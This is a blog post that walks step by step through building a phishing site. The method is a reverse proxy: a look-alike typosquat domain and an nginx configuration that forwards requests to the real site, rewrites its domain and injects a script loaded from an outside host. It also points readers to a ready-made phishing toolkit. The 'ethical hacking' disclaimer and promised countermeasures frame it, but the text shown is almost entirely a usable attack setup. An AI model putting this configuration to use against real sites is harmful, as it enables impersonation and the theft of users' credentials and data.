How to create the perfect phishing site
This guide is for ethical hacking purposes only! Don’t use it for malicious stuff.
Phishing is the most common and easiest way, to steal user data. As an administrator it is my job to secure our sites against different kinds of attacks. Unfortunately there is no technical way right now, to protect the users against phishing sites.
In this blog post, I demonstrate the easiest way to create a perfect phishing site. In a succeeding blog post, I will discuss possible counter methods.
Approach 1 - Copy The Site
This is the most common approach. Most “How to” recommend this approach for creating a phishing site. In my opinion, this is not a very elegant way of doing it. It is the more effortful approach and the results is most often far away from perfect. Well most times this is enough for the common phishing site. But I would prefer another approach for a targeted attack.
Approach 2 - Reverse Proxy
There’s a much easier approach. By setting up a reverse proxy, you do not have to copy the site. You just forward any requests to the faked site and manipulate the response. But how does that work? The following guide is not complete. It does not include methods for bypassing any countermeasures.
Step 1 - Setup A Small Server
Setup a small root server. E.g. you could use a 5$ Digitalocean droplet. In this tutorial I use Debian/Ubuntu. The command will be different on other distributions.
Step 2 - Setup A Domain
Find a domain, that is as close to the target domain as possible. If the target domain is "next-gen-company.com", check whether "next-gen-company-ag.com" is available. If your domain is close to the original domain, your phishing site is more successful.
Step 3 - Configure Your DNS Zone
Setup the A record for "next-gen-company-ag.com" and point it to your server.
Step 4 - Install nginx
Install the web server nginx. On Debian/Ubuntu you can do this, by typing:
sudo apt-get install nginx
Step 5 - Configure nginx
Put the following code into the file /etc/nginx/sites-available/default:
server {
listen 80 default_server;
listen [::]:80 default_server;
location / {
proxy_pass https://next-gen-company.com;
sub_filter next-gen-company.com next-gen-company-ag.com;
sub_filter "</head>" "<script src='https://url.com/your-malicious-script.js'></script></head>";
proxy_set_header Accept-Encoding "";
sub_filter_once off;
}
}
Step 6 - Reload Server
Check the configuration with
nginx -t
If the configuration is ok run
service nginx reload
Thats it
That was simple! Wasn’t it? Just open next-gen-company-ag.com and watch the result.
There may be some more modification to do, but I think you got the point.
EvilNginx2
If you are looking for a ready to use solution for penetration testing checkout https://github.com/kgretzky/evilginx2
Back to Posts